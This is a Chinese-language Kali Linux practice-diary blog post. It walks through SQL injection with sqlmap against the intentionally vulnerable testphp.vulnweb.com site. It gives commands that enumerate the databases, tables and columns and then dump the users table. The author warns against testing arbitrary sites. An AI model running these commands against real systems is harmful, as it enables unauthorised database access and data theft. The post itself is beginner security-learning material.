iT邦幫忙

2019 iT 邦幫忙鐵人賽

DAY 5
0

sqlmap

是一個sql檢測工具

日記
本來是想寫bbqsql的但是昨天明明測試還好的
今天一打開卻出現錯誤...
重裝好多次
弄到最後還是modulerror QAQ
只好隨便找一個一樣是sql系列的來充數

首先,找一個專門提供測試的網站~
隨便找網站測試會被警察抓走的!!被抓走不負責!!!

之後要找注入點
就是當一個包含id的網址,當你把它後面加'符號時會吐SQL錯誤,它就是有弱點
ex:
http://testphp.vulnweb.com/artists.php?artist=1
變加上'
http://testphp.vulnweb.com/artists.php?artist=1'
https://ithelp.ithome.com.tw/upload/images/20181020/20111894tdX5NMBxti.png

在裡面輸入
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
它就會開始跑了

看到這一行就代表選對了id
https://ithelp.ithome.com.tw/upload/images/20181020/20111894q5QlBbEDOD.png

其中它跳出了兩個問題給我
https://ithelp.ithome.com.tw/upload/images/20181020/20111894HyhP74LRGY.png
第一個是發現該系統是MySQL問我是否放棄測試其他的DBSM
第二個是是否加深risk和value 越高越花時間~

https://ithelp.ithome.com.tw/upload/images/20181020/2011189462mSf61Uo0.png
https://ithelp.ithome.com.tw/upload/images/20181020/20111894Yst6Fj8AO0.png

可以發現他有兩個database
選擇一個進去看
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --D acuart --tables

https://ithelp.ithome.com.tw/upload/images/20181020/20111894kL62lXOFVc.png
發現有users這個項目

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --D acuart -T users --columns
https://ithelp.ithome.com.tw/upload/images/20181020/20111894U8U6uTHtrY.png
可以發現裡面包含了許多項目
隨機挑一個測試就可以叫出來裡面的資料了

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C ID --dump
https://ithelp.ithome.com.tw/upload/images/20181020/20111894XOZlQzGwdG.png

滿好玩的一個工具,就算沒弄懂原理也可以小小滿足一下當個skiddie的快感

參考資料:https://www.youtube.com/watch?v=OlL6IdSMImA
http://shadownull.blogspot.com/2015/08/sql-injection-tutorial.html
http://xdeath.dyndns.pro/read.php?69
https://www.ichiayi.com/wiki/tech/sqlmap
https://linuxtrack.net/viewtopic.php?id=1074


上一篇
Day3 John先生你跟Johnny是什麼關係?484cp?(Jhon篇)
下一篇
Day5 最近跟人聊天都訊號差...radare2
系列文
咖哩?能吃嗎? -- kali linux練習日記20

尚未有邦友留言

立即登入留言